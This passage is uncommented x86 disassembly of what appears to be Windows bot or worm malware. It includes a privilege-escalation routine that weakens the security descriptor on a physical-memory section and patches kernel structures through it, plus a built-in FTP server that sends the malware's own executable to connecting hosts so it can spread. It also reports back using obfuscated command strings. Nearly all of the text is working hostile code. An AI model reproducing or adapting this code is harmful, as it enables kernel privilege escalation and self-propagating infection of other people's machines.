mov [ebp+var_14], eax
mov [ebp+var_10], offset aCurrent_user ; "CURRENT_USER"
mov [ebp+var_4], esi
call dword_437020 ; SetEntriesInAclA
test eax, eax
jnz short loc_4028E2
push esi
push [ebp+var_4]
push esi
push esi
push 4
push 6
push [ebp+arg_0]
call dword_437024 ; SetSecurityInfo
test eax, eax
jz short loc_4028FC
loc_4028E2: ; CODE XREF: sub_40285A+6F�j
cmp [ebp+var_8], esi
mov edi, dword_43703C
jz short loc_4028F2
push [ebp+var_8]
call edi ; dword_43703C
loc_4028F2: ; CODE XREF: sub_40285A+91�j
cmp [ebp+var_4], esi
jz short loc_4028FC
push [ebp+var_4]
call edi ; dword_43703C
loc_4028FC: ; CODE XREF: sub_40285A+2A�j
; sub_40285A+86�j ...
pop edi
pop esi
leave
retn
sub_40285A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402900 proc near ; CODE XREF: sub_402BA8+83�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = byte ptr -8
push ebp
mov ebp, esp
sub esp, 20h
cmp dword_454024, 5
push edi
jnz short loc_402925
mov eax, dword_454028
xor edi, edi
cmp eax, edi
jz short loc_40292D
cmp eax, 1
jz short loc_40292D
cmp eax, 2
jz short loc_40292D
loc_402925: ; CODE XREF: sub_402900+E�j
or eax, 0FFFFFFFFh
jmp loc_4029DC
; ---------------------------------------------------------------------------
loc_40292D: ; CODE XREF: sub_402900+19�j
; sub_402900+1E�j ...
push esi
lea eax, [ebp+var_8]
push offset off_43AC84
push eax
call dword_454A14 ; RtlInitUnicodeString
lea eax, [ebp+var_8]
mov esi, offset dword_454A24
mov [ebp+var_18], eax
lea eax, [ebp+var_20]
push eax
push 6
push esi
mov [ebp+var_20], 18h
mov [ebp+var_1C], edi
mov [ebp+var_14], edi
mov [ebp+var_10], edi
mov [ebp+var_C], edi
call dword_454A18 ; ZwOpenSection
cmp eax, 0C0000022h
jnz short loc_4029A4
lea eax, [ebp+var_20]
push eax
push 60000h
push esi
call dword_454A18 ; ZwOpenSection
push dword_454A24
call sub_40285A
pop ecx
push dword_454A24
call dword_437044 ; CloseHandle
lea eax, [ebp+var_20]
push eax
push 6
push esi
call dword_454A18 ; ZwOpenSection
loc_4029A4: ; CODE XREF: sub_402900+6D�j
cmp eax, edi
pop esi
jge short loc_4029AE
push 0FFFFFFFEh
pop eax
jmp short loc_4029DC
; ---------------------------------------------------------------------------
loc_4029AE: ; CODE XREF: sub_402900+A7�j
push 1000h
push 39000h
push edi
push 6
push dword_454A24
call dword_437040 ; MapViewOfFile
xor ecx, ecx
cmp eax, edi
setnz cl
mov dword_454A20, eax
lea ecx, ds:0FFFFFFFDh[ecx*4]
mov eax, ecx
loc_4029DC: ; CODE XREF: sub_402900+28�j
; sub_402900+AC�j
pop edi
leave
retn
sub_402900 endp
; =============== S U B R O U T I N E =======================================
sub_4029DF proc near ; CODE XREF: sub_402BA8+E8�p
; sub_402BA8:loc_402CA9�p
mov eax, dword_454A20
test eax, eax
jz short loc_4029EF
push eax
call dword_437048 ; UnmapViewOfFile
loc_4029EF: ; CODE XREF: sub_4029DF+7�j
mov eax, dword_454A24
test eax, eax
jz short loc_4029FF
push eax
call dword_437044 ; CloseHandle
loc_4029FF: ; CODE XREF: sub_4029DF+17�j
and dword_454A20, 0
and dword_454A24, 0
retn
sub_4029DF endp
; =============== S U B R O U T I N E =======================================
sub_402A0E proc near ; CODE XREF: sub_402A86+B�p
; sub_402AD7+B�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
push esi
test eax, eax
push edi
jz short loc_402A81
mov edi, [esp+8+arg_4]
mov ecx, edi
shr ecx, 16h
mov eax, [eax+ecx*4]
test al, 1
jz short loc_402A81
test al, al
jns short loc_402A3A
mov esi, eax
xor esi, edi
and esi, 3FFFFFh
xor esi, eax
jmp short loc_402A7D
; ---------------------------------------------------------------------------
loc_402A3A: ; CODE XREF: sub_402A0E+1C�j
and ax, 0F000h
push 1000h
push eax
push 0
push 0F001Fh
push dword_454A24
call dword_437040 ; MapViewOfFile
mov ecx, edi
shr ecx, 0Ch
and ecx, 3FFh
mov ecx, [eax+ecx*4]
test cl, 1
jz short loc_402A81
mov esi, ecx
push eax
xor esi, edi
and esi, 0FFFh
xor esi, ecx
call dword_437048 ; UnmapViewOfFile
loc_402A7D: ; CODE XREF: sub_402A0E+2A�j
mov eax, esi
jmp short loc_402A83
; ---------------------------------------------------------------------------
loc_402A81: ; CODE XREF: sub_402A0E+8�j
; sub_402A0E+18�j ...
xor eax, eax
loc_402A83: ; CODE XREF: sub_402A0E+71�j
pop edi
pop esi
retn
sub_402A0E endp
; =============== S U B R O U T I N E =======================================
sub_402A86 proc near ; CODE XREF: sub_402BA8+92�p
; sub_402BA8+A0�p ...
arg_0 = dword ptr 4
push esi
push [esp+4+arg_0]
push dword_454A20
call sub_402A0E
mov esi, eax
pop ecx
test esi, esi
pop ecx
jz short loc_402ABC
and ax, 0F000h
push 1000h
push eax
push 0
push 4
push dword_454A24
call dword_437040 ; MapViewOfFile
test eax, eax
jnz short loc_402AC0
loc_402ABC: ; CODE XREF: sub_402A86+16�j
xor eax, eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_402AC0: ; CODE XREF: sub_402A86+34�j
shr esi, 2
and esi, 3FFh
push eax
mov esi, [eax+esi*4]
call dword_437048 ; UnmapViewOfFile
mov eax, esi
pop esi
retn
sub_402A86 endp
; =============== S U B R O U T I N E =======================================
sub_402AD7 proc near ; CODE XREF: sub_402BA8+D0�p
; sub_402BA8+DD�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
push [esp+4+arg_0]
push dword_454A20
call sub_402A0E
mov esi, eax
pop ecx
test esi, esi
pop ecx
jz short loc_402B0D
and ax, 0F000h
push 1000h
push eax
push 0
push 2
push dword_454A24
call dword_437040 ; MapViewOfFile
test eax, eax
jnz short loc_402B11
loc_402B0D: ; CODE XREF: sub_402AD7+16�j
xor eax, eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_402B11: ; CODE XREF: sub_402AD7+34�j
mov ecx, [esp+4+arg_4]
push eax
shr esi, 2
and esi, 3FFh
mov [eax+esi*4], ecx
call dword_437048 ; UnmapViewOfFile
xor eax, eax
pop esi
inc eax
retn
sub_402AD7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402B2D proc near ; CODE XREF: sub_402BA8+6F�p
; sub_402BA8+F5�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = byte ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 20h
lea eax, [ebp+var_4]
push eax
push 28h
call dword_43704C ; GetCurrentProcess
push eax
call dword_437010 ; OpenProcessToken
test eax, eax
jnz short loc_402B4C
leave
retn
; ---------------------------------------------------------------------------
loc_402B4C: ; CODE XREF: sub_402B2D+1B�j
lea eax, [ebp+var_10]
push esi
push eax
xor esi, esi
push [ebp+arg_0]
push esi
call dword_437014 ; LookupPrivilegeValueA
test eax, eax
jz short loc_402B9A
mov eax, [ebp+var_10]
mov [ebp+var_20], 1
mov [ebp+var_1C], eax
mov eax, [ebp+var_C]
mov [ebp+var_18], eax
xor eax, eax
cmp [ebp+arg_4], esi
setz al
lea eax, [eax+eax+2]
mov [ebp+var_14], eax
lea eax, [ebp+var_8]
push eax
push esi
lea eax, [ebp+var_20]
push 10h
push eax
push esi
push [ebp+var_4]
call dword_437018 ; AdjustTokenPrivileges
mov esi, eax
loc_402B9A: ; CODE XREF: sub_402B2D+32�j
push [ebp+var_4]
call dword_437044 ; CloseHandle
mov eax, esi
pop esi
leave
retn
sub_402B2D endp
; =============== S U B R O U T I N E =======================================
sub_402BA8 proc near ; CODE XREF: sub_418EDB+22F�p
push ebx
push ebp
push esi
push edi
push offset dword_454020
mov dword_454020, 94h
call dword_437050 ; GetVersionExA
test eax, eax
jz loc_402CB3
cmp dword_454024, 5
jnz loc_402CB3
mov eax, dword_454028
test eax, eax
jnz short loc_402BEB
mov edi, 0A0h
mov ebx, 0A4h
jmp short loc_402C0F
; ---------------------------------------------------------------------------
loc_402BEB: ; CODE XREF: sub_402BA8+35�j
cmp eax, 1
jnz short loc_402BFC
mov edi, 88h
mov ebx, 8Ch
jmp short loc_402C0F
; ---------------------------------------------------------------------------
loc_402BFC: ; CODE XREF: sub_402BA8+46�j
cmp eax, 2
jnz loc_402CB3
mov edi, 8Ah
mov ebx, 8Eh
loc_402C0F: ; CODE XREF: sub_402BA8+41�j
; sub_402BA8+52�j
mov ebp, offset aSesecuritypriv ; "SeSecurityPrivilege"
push 1
push ebp
call sub_402B2D
pop ecx
pop ecx
call sub_4027F3
test eax, eax
jz loc_402CB3
call sub_402900
cmp eax, 1
jnz short loc_402CAE
push 0FFDFF124h
call sub_402A86
test eax, eax
pop ecx
jz short loc_402CA9
add eax, 44h
push eax
call sub_402A86
mov esi, eax
pop ecx
test esi, esi
jz short loc_402CA9
lea eax, [esi+edi]
push eax
call sub_402A86
add esi, ebx
mov edi, eax
push esi
call sub_402A86
pop ecx
mov esi, eax
test edi, edi
pop ecx
jz short loc_402CA9
test esi, esi
jz short loc_402CA9
lea eax, [edi+4]
push esi
push eax
call sub_402AD7
pop ecx
test eax, eax
pop ecx
jz short loc_402CA9
push edi
push esi
call sub_402AD7
pop ecx
test eax, eax
pop ecx
jz short loc_402CA9
call sub_4029DF
call sub_402842
push 0
push ebp
call sub_402B2D
pop ecx
xor eax, eax
pop ecx
inc eax
jmp short loc_402CB5
; ---------------------------------------------------------------------------
loc_402CA9: ; CODE XREF: sub_402BA8+9A�j
; sub_402BA8+AA�j ...
call sub_4029DF
loc_402CAE: ; CODE XREF: sub_402BA8+8B�j
call sub_402842
loc_402CB3: ; CODE XREF: sub_402BA8+1B�j
; sub_402BA8+28�j ...
xor eax, eax
loc_402CB5: ; CODE XREF: sub_402BA8+FF�j
pop edi
pop esi
pop ebp
pop ebx
retn
sub_402BA8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402CBA proc near ; DATA XREF: sub_4020AA+F1�o
; sub_406C3A+DD�o ...
var_2E08 = byte ptr -2E08h
var_6F8 = byte ptr -6F8h
var_694 = byte ptr -694h
var_480 = dword ptr -480h
var_47C = byte ptr -47Ch
var_3FC = dword ptr -3FCh
var_3EC = dword ptr -3ECh
var_3E8 = dword ptr -3E8h
var_2E4 = byte ptr -2E4h
var_2B0 = byte ptr -2B0h
var_24C = dword ptr -24Ch
var_248 = dword ptr -248h
var_244 = dword ptr -244h
var_148 = byte ptr -148h
var_138 = byte ptr -138h
var_D4 = byte ptr -0D4h
var_A0 = word ptr -0A0h
var_9E = word ptr -9Eh
var_9C = dword ptr -9Ch
var_90 = byte ptr -90h
var_80 = dword ptr -80h
var_7C = byte ptr -7Ch
var_74 = byte ptr -74h
var_70 = byte ptr -70h
var_68 = byte ptr -68h
var_64 = byte ptr -64h
var_5C = dword ptr -5Ch
var_58 = byte ptr -58h
var_50 = byte ptr -50h
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = byte ptr -40h
var_3C = byte ptr -3Ch
var_34 = byte ptr -34h
var_30 = byte ptr -30h
var_28 = dword ptr -28h
var_24 = byte ptr -24h
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_10 = byte ptr -10h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 2E08h
call sub_429A90
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
mov ecx, 0ABh
mov esi, eax
lea edi, [ebp+var_694]
xor ebx, ebx
rep movsd
xor esi, esi
push ebx
inc esi
push ebx
mov [eax+2A4h], esi
mov eax, [ebp+var_3EC]
push ebx
mov [ebp+var_8], eax
mov eax, [ebp+var_480]
push offset sub_41EAD6
push ebx
push ebx
mov [ebp+var_44], esi
mov [ebp+var_1C], esi
mov [ebp+var_24C], ebx
mov [ebp+var_3E8], ebx
mov dword_454A10, eax
call dword_43717C ; CreateThread
push ebx
push esi
push 2
call dword_456FB0 ; socket
lea ecx, [ebp+var_44]
push 4
push ecx
push 4
push 0FFFFh
push eax
mov dword_4549FC, eax
call dword_456EF0 ; setsockopt
lea eax, [ebp+var_1C]
push eax
push 8004667Eh
push dword_4549FC
call dword_456FD4 ; ioctlsocket
mov ax, word ptr dword_454A10
mov [ebp+var_A0], 2
push eax
mov [ebp+var_9C], ebx
call dword_456F18 ; ntohs
mov [ebp+var_9E], ax
lea eax, [ebp+var_A0]
push 10h
push eax
push dword_4549FC
call dword_456F4C ; bind
test eax, eax
jge short loc_402D98
mov eax, esi
jmp loc_403240
; ---------------------------------------------------------------------------
loc_402D98: ; CODE XREF: sub_402CBA+D5�j
push 0Ah
push dword_4549FC
call dword_456F48 ; listen
mov eax, dword_4549FC
mov [ebp+var_24C], esi
mov [ebp+var_248], eax
mov [ebp+var_4], eax
loc_402DBA: ; CODE XREF: sub_402CBA+137�j
; sub_402CBA+57E�j
push 41h
lea eax, [ebp+var_3E8]
pop ecx
lea esi, [ebp+var_24C]
push ebx
push ebx
push ebx
push eax
mov eax, [ebp+var_4]
lea edi, [ebp+var_3E8]
inc eax
rep movsd
push eax
call dword_456EFC ; select
cmp eax, 0FFFFFFFFh
jz loc_40323D
xor esi, esi
cmp [ebp+var_4], ebx
mov [ebp+arg_0], esi
jl short loc_402DBA
loc_402DF3: ; CODE XREF: sub_402CBA+578�j
push 64h
lea eax, [ebp+var_2B0]
push ebx
push eax
call sub_429690
push 64h
lea eax, [ebp+var_138]
push ebx
push eax
call sub_429690
add esp, 18h
lea eax, [ebp+var_3E8]
push eax
push esi
call dword_456DB8 ; __WSAFDIsSet
test eax, eax
jz loc_40322B
mov eax, dword_4549FC
cmp esi, eax
jnz loc_402EBD
lea ecx, [ebp+var_5C]
mov [ebp+var_5C], 10h
push ecx
lea ecx, [ebp+var_148]
push ecx
push eax
call dword_456FC4 ; accept
cmp eax, 0FFFFFFFFh
mov [ebp+var_28], eax
jz loc_40322B
mov edx, [ebp+var_24C]
xor ecx, ecx
cmp edx, ebx
jbe short loc_402E76
loc_402E68: ; CODE XREF: sub_402CBA+1BA�j
cmp [ebp+ecx*4+var_248], eax
jz short loc_402E76
inc ecx
cmp ecx, edx
jb short loc_402E68
loc_402E76: ; CODE XREF: sub_402CBA+1AC�j
; sub_402CBA+1B5�j
cmp ecx, edx
jnz short loc_402E8C
cmp edx, 40h
jnb short loc_402E8C
mov [ebp+ecx*4+var_248], eax
inc [ebp+var_24C]
loc_402E8C: ; CODE XREF: sub_402CBA+1BE�j
; sub_402CBA+1C3�j
cmp eax, [ebp+var_4]
jle short loc_402E94
mov [ebp+var_4], eax
loc_402E94: ; CODE XREF: sub_402CBA+1D5�j
mov esi, offset a220 ; "220\r\n"
lea edi, [ebp+var_7C]
movsd
lea eax, [ebp+var_7C]
push ebx
push eax
movsw
call sub_4292D0
pop ecx
push eax
lea eax, [ebp+var_7C]
push eax
push [ebp+var_28]
call dword_456F6C ; send
jmp loc_403228
; ---------------------------------------------------------------------------
loc_402EBD: ; CODE XREF: sub_402CBA+177�j
push ebx
lea eax, [ebp+var_2B0]
push 64h
push eax
push esi
call dword_456F38 ; recv
test eax, eax
jg short loc_402F1A
mov ecx, [ebp+var_24C]
xor eax, eax
cmp ecx, ebx
jbe short loc_402F0E
loc_402EDE: ; CODE XREF: sub_402CBA+230�j
cmp [ebp+eax*4+var_248], esi
jz short loc_402F03
inc eax
cmp eax, ecx
jb short loc_402EDE
jmp short loc_402F0E
; ---------------------------------------------------------------------------
loc_402EEE: ; CODE XREF: sub_402CBA+24C�j
mov ecx, [ebp+eax*4+var_244]
mov [ebp+eax*4+var_248], ecx
mov ecx, [ebp+var_24C]
inc eax
loc_402F03: ; CODE XREF: sub_402CBA+22B�j
dec ecx
cmp eax, ecx
jb short loc_402EEE
dec [ebp+var_24C]
loc_402F0E: ; CODE XREF: sub_402CBA+222�j
; sub_402CBA+232�j
push esi
call dword_456FD0 ; closesocket
jmp loc_40322B
; ---------------------------------------------------------------------------
loc_402F1A: ; CODE XREF: sub_402CBA+216�j
lea eax, [ebp+var_6F8]
push eax
lea eax, [ebp+var_138]
push eax
lea eax, [ebp+var_2B0]
push offset aSS_1 ; "%s %s"
push eax
call sub_429D3E
mov esi, dword_437174
add esp, 10h
lea eax, [ebp+var_138]
push offset aUser ; "USER"
push eax
call esi ; dword_437174
test eax, eax
jnz short loc_402F73
mov esi, offset a331 ; "331\r\n"
lea edi, [ebp+var_58]
movsd
lea eax, [ebp+var_58]
push ebx
push eax
movsw
call sub_4292D0
pop ecx
push eax
lea eax, [ebp+var_58]
jmp loc_40320C
; ---------------------------------------------------------------------------
loc_402F73: ; CODE XREF: sub_402CBA+298�j
lea eax, [ebp+var_138]
push offset aPass ; "PASS"
push eax
call esi ; dword_437174
test eax, eax
jnz short loc_402FA4
mov esi, offset a230 ; "230\r\n"
lea edi, [ebp+var_70]
movsd
lea eax, [ebp+var_70]
push ebx
push eax
movsw
call sub_4292D0
pop ecx
push eax
lea eax, [ebp+var_70]
jmp loc_40320C
; ---------------------------------------------------------------------------
loc_402FA4: ; CODE XREF: sub_402CBA+2C9�j
lea eax, [ebp+var_138]
push offset aPort ; "PORT"
push eax
call esi ; dword_437174
test eax, eax
jnz loc_40307F
lea eax, [ebp+var_2E4]
push eax
lea eax, [ebp+var_D4]
push eax
lea eax, [ebp+var_68]
push eax
lea eax, [ebp+var_34]
push eax
lea eax, [ebp+var_74]
push eax
lea eax, [ebp+var_40]
push eax
lea eax, [ebp+var_2B0]
push offset aS ; "%*s %[^,],%[^,],%[^,],%[^,],%[^,],%[^\n]"...
push eax
call sub_429D3E
lea eax, [ebp+var_D4]
push eax
call sub_42A030
mov esi, eax
lea eax, [ebp+var_2E4]
push eax
call sub_42A030
mov edi, eax
push 32h
lea eax, [ebp+var_D4]
push ebx
push eax
call sub_429690
push edi
push esi
lea eax, [ebp+var_D4]
push offset aXX ; "%x%x\n"
push eax
call sub_429A33
add esp, 44h
lea eax, [ebp+var_D4]
push 10h
push ebx
push eax
call sub_429F8E
mov [ebp+var_80], eax
lea eax, [ebp+var_68]
push eax
lea eax, [ebp+var_34]
push eax
lea eax, [ebp+var_74]
push eax
lea eax, [ebp+var_40]
push eax
lea eax, [ebp+var_90]
push offset dword_43AB7C
push eax
call sub_429A33
mov esi, offset a200 ; "200\r\n"
lea edi, [ebp+var_64]
add esp, 24h
lea eax, [ebp+var_64]
movsd
push ebx
push eax
movsw
call sub_4292D0
pop ecx
push eax
lea eax, [ebp+var_64]
jmp loc_40320C
; ---------------------------------------------------------------------------
loc_40307F: ; CODE XREF: sub_402CBA+2FA�j
lea eax, [ebp+var_138]
push offset aRetr ; "RETR"
push eax
call esi ; dword_437174
test eax, eax
jnz loc_4031C5
mov esi, offset a150 ; "150\r\n"
lea edi, [ebp+var_10]
movsd
lea eax, [ebp+var_10]
push ebx
push eax
movsw
call sub_4292D0
pop ecx
push eax
lea eax, [ebp+var_10]
push eax
push [ebp+arg_0]
call dword_456F6C ; send
lea eax, [ebp+var_48]
push eax
lea eax, [ebp+var_47C]
push [ebp+var_3FC]
push eax
lea eax, [ebp+var_2E08]
push [ebp+var_3EC]
push eax
lea eax, [ebp+var_90]
push [ebp+var_80]
push eax
call sub_403247
add esp, 1Ch
test eax, eax
jz loc_4031A9
push [ebp+var_48]
call sub_4032A3
pop ecx
mov esi, offset a226 ; "226\r\n"
test eax, eax
push ebx
jle loc_403193
lea edi, [ebp+var_50]
lea eax, [ebp+var_50]
movsd
push eax
movsw
call sub_4292D0
pop ecx
push eax
lea eax, [ebp+var_50]
push eax
push [ebp+arg_0]
call dword_456F6C ; send
inc dword_457CE8
cmp dword_454A2C, ebx
jz short loc_40315F
cmp dword_454A30, ebx
jnz short loc_40316B
lea eax, [ebp+var_90]
push eax
push offset aJt17j1imtvd1 ; "jt17J1ImTVD1"
lea eax, [ebp+var_47C]
push offset aSS_2 ; "%s -> %s"
push eax
push [ebp+var_8]
call sub_41CD84
add esp, 14h
loc_40315F: ; CODE XREF: sub_402CBA+478�j
cmp dword_454A30, ebx
jz loc_403216
loc_40316B: ; CODE XREF: sub_402CBA+480�j
lea eax, [ebp+var_90]
push eax
push offset aJt17j1imtvd1 ; "jt17J1ImTVD1"
lea eax, [ebp+var_47C]
push offset aSS_2 ; "%s -> %s"
push eax
push [ebp+var_8]
call sub_41CD0E
add esp, 14h
jmp loc_403216
; ---------------------------------------------------------------------------
loc_403193: ; CODE XREF: sub_402CBA+448�j
lea edi, [ebp+var_18]
lea eax, [ebp+var_18]
movsd
push eax
movsw
call sub_4292D0
pop ecx
push eax
lea eax, [ebp+var_18]
jmp short loc_40320C
; ---------------------------------------------------------------------------
loc_4031A9: ; CODE XREF: sub_402CBA+431�j
mov esi, offset a425 ; "425\r\n"
lea edi, [ebp+var_24]
movsd
lea eax, [ebp+var_24]
push ebx
push eax
movsw
call sub_4292D0
pop ecx
push eax
lea eax, [ebp+var_24]
jmp short loc_40320C
; ---------------------------------------------------------------------------
loc_4031C5: ; CODE XREF: sub_402CBA+3D5�j
lea eax, [ebp+var_138]
push offset aQuit ; "QUIT"
push eax
call esi ; dword_437174
test eax, eax
push ebx
jnz short loc_4031F3
mov esi, offset a221 ; "221\r\n"
lea edi, [ebp+var_30]
movsd
lea eax, [ebp+var_30]
push eax
movsw
call sub_4292D0
pop ecx
push eax
lea eax, [ebp+var_30]
jmp short loc_40320C
; ---------------------------------------------------------------------------
loc_4031F3: ; CODE XREF: sub_402CBA+51C�j
mov esi, offset a503 ; "503\r\n"
lea edi, [ebp+var_3C]
movsd
lea eax, [ebp+var_3C]
push eax
movsw
call sub_4292D0
pop ecx
push eax
lea eax, [ebp+var_3C]
loc_40320C: ; CODE XREF: sub_402CBA+2B4�j
; sub_402CBA+2E5�j ...
push eax
push [ebp+arg_0]
call dword_456F6C ; send
loc_403216: ; CODE XREF: sub_402CBA+4AB�j
; sub_402CBA+4D4�j
push 64h
lea eax, [ebp+var_2B0]
push ebx
push eax
call sub_429690
add esp, 0Ch
loc_403228: ; CODE XREF: sub_402CBA+1FE�j
mov esi, [ebp+arg_0]
loc_40322B: ; CODE XREF: sub_402CBA+16A�j
; sub_402CBA+19C�j ...
inc esi
cmp esi, [ebp+var_4]
mov [ebp+arg_0], esi
jle loc_402DF3
jmp loc_402DBA
; ---------------------------------------------------------------------------
loc_40323D: ; CODE XREF: sub_402CBA+129�j
xor eax, eax
inc eax
loc_403240: ; CODE XREF: sub_402CBA+D9�j
pop edi
pop esi
pop ebx
leave
retn 4
sub_402CBA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403247 proc near ; CODE XREF: sub_402CBA+427�p
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
sub esp, 10h
push esi
push 0
push 1
push 2
call dword_456FB0 ; socket
mov esi, [ebp+arg_18]
push [ebp+arg_0]
mov [ebp+var_10], 2
mov [esi], eax
call dword_456F5C ; inet_addr
push [ebp+arg_4]
mov [ebp+var_C], eax
call dword_456F18 ; ntohs
mov [ebp+var_E], ax
lea eax, [ebp+var_10]
push 10h
push eax
push dword ptr [esi]
call dword_456E9C ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_40329D
push dword ptr [esi]
call dword_456FD0 ; closesocket
xor eax, eax
jmp short loc_4032A0
; ---------------------------------------------------------------------------
loc_40329D: ; CODE XREF: sub_403247+48�j
xor eax, eax
inc eax
loc_4032A0: ; CODE XREF: sub_403247+54�j
pop esi
leave
retn
sub_403247 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4032A3 proc near ; CODE XREF: sub_402CBA+43A�p
var_1108 = byte ptr -1108h
var_108 = byte ptr -108h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 1108h
call sub_429A90
push ebx
push esi
push edi
lea eax, [ebp+var_108]
push 104h
xor edi, edi
push eax
push edi
call dword_437178 ; GetModuleFileNameA
lea eax, [ebp+var_108]
push offset aRb ; "rb"
push eax
call sub_42A43C
mov esi, eax
pop ecx
xor ebx, ebx
cmp esi, edi
pop ecx
mov [ebp+var_4], edi
jz short loc_403352
push 2
push edi
push esi
call sub_42A352
push esi
call sub_42A1CF
push edi
push edi
push esi
mov [ebp+var_4], eax
call sub_42A352
add esp, 1Ch
jmp short loc_40334C
; ---------------------------------------------------------------------------
loc_403305: ; CODE XREF: sub_4032A3+AD�j
push 1000h
lea eax, [ebp+var_1108]
push edi
push eax
call sub_429690
push esi
push 800h
lea eax, [ebp+var_1108]
push 1
push eax
call sub_42A0B8
add esp, 1Ch
test byte ptr [esi+0Ch], 20h
jnz short loc_403352
cmp eax, edi
jle short loc_40334C
push edi
push eax
lea eax, [ebp+var_1108]
push eax
push [ebp+arg_0]
call dword_456F6C ; send
add ebx, eax
loc_40334C: ; CODE XREF: sub_4032A3+60�j
; sub_4032A3+93�j
test byte ptr [esi+0Ch], 10h
jz short loc_403305
loc_403352: ; CODE XREF: sub_4032A3+41�j
; sub_4032A3+8F�j
push esi
call sub_42A03B
pop ecx
push [ebp+arg_0]
call dword_456FD0 ; closesocket
mov eax, [ebp+var_4]
pop edi
sub eax, ebx
pop esi
neg eax
sbb eax, eax
not eax
and eax, ebx
pop ebx
leave
retn
sub_4032A3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403374 proc near ; CODE XREF: sub_40A938+153�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ebx
push esi
push edi
push 0Ch
xor edi, edi
xor ebx, ebx
call sub_423756
cmp eax, edi
pop ecx
jle loc_40342E
mov esi, eax
imul esi, 2724h
cmp dword_46D70C[esi], edi
jz short loc_40339F
inc ebx
loc_40339F: ; CODE XREF: sub_403374+28�j
push dword_4549FC
and byte ptr dword_46AFF0[esi], 0
mov dword_46D70C[esi], edi
mov dword_46D700[esi], edi
mov dword_46D704[esi], edi
mov dword_46D708[esi], edi
call dword_456FD0 ; closesocket
push edi
push dword_46D70C[esi]
call dword_437054 ; TerminateThread
cmp ebx, edi
jz short loc_40342E
cmp [ebp+arg_8], 0
mov ebx, offset aBnjcz_zig1m0 ; "bNJcZ.ziG1m0"
mov esi, offset aJt17j1imtvd1 ; "jt17J1ImTVD1"
mov edi, offset aSSDS ; "%s %s %d %s"
jnz short loc_40340E
cmp [ebp+arg_C], 0
jnz short loc_403414
push offset aTfee90w_vdg1u8 ; "TFEE90W.vdG1u8Ajp1eidrT.d2k2X/no6gm/"
push 1
push ebx
push esi
push edi
push [ebp+arg_0]
push [ebp+arg_4]
call sub_41CD84
add esp, 1Ch
loc_40340E: ; CODE XREF: sub_403374+7A�j
cmp [ebp+arg_C], 0
jz short loc_403471
loc_403414: ; CODE XREF: sub_403374+80�j
push offset aTfee90w_vdg1u8 ; "TFEE90W.vdG1u8Ajp1eidrT.d2k2X/no6gm/"
push 1
push ebx
push esi
push edi
push [ebp+arg_0]
push [ebp+arg_4]
call sub_41CD0E
add esp, 1Ch
jmp short loc_403471
; ---------------------------------------------------------------------------
loc_40342E: ; CODE XREF: sub_403374+14�j
; sub_403374+65�j
cmp [ebp+arg_8], 0
mov esi, offset aJt17j1imtvd1 ; "jt17J1ImTVD1"
mov ebx, offset aIbtox1Hofe0hcx ; "IBtOx1/HOfe0Hcxmb/oUlVg00eWuQ.F61Hj/"
mov edi, offset aSS_1 ; "%s %s"
jnz short loc_40345A
cmp [ebp+arg_C], 0
jnz short loc_403460
push ebx
push esi
push edi
push [ebp+arg_0]
push [ebp+arg_4]
call sub_41CD84
add esp, 14h
loc_40345A: ; CODE XREF: sub_403374+CD�j
cmp [ebp+arg_C], 0
jz short loc_403471
loc_403460: ; CODE XREF: sub_403374+D3�j
push ebx
push esi
push edi
push [ebp+arg_0]
push [ebp+arg_4]
call sub_41CD0E
add esp, 14h
loc_403471: ; CODE XREF: sub_403374+9E�j
; sub_403374+B8�j ...
pop edi
pop esi
pop ebx
pop ebp
retn
sub_403374 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403476 proc near ; CODE XREF: sub_407F26+3A�p
var_F4 = byte ptr -0F4h
var_F0 = byte ptr -0F0h
var_90 = byte ptr -90h
var_74 = byte ptr -74h
var_3C = byte ptr -3Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0F4h
push ebx
push esi
xor ebx, ebx
push edi
xor ecx, ecx
loc_403486: ; CODE XREF: sub_403476+37�j
movzx eax, byte_43AE00[ecx]
mov esi, [ebp+arg_0]
mov edx, eax
sar edx, 3
and eax, 7
mov dl, [edx+esi]
test byte_43AD90[eax*2], dl
setnz al
mov [ebp+ecx+var_74], al
inc ecx
cmp ecx, 38h
jl short loc_403486
mov [ebp+arg_0], ebx
mov [ebp+var_4], 1Eh
loc_4034B9: ; CODE XREF: sub_403476+F2�j
cmp [ebp+arg_4], 1
jnz short loc_4034C4
mov eax, [ebp+var_4]
jmp short loc_4034C9
; ---------------------------------------------------------------------------
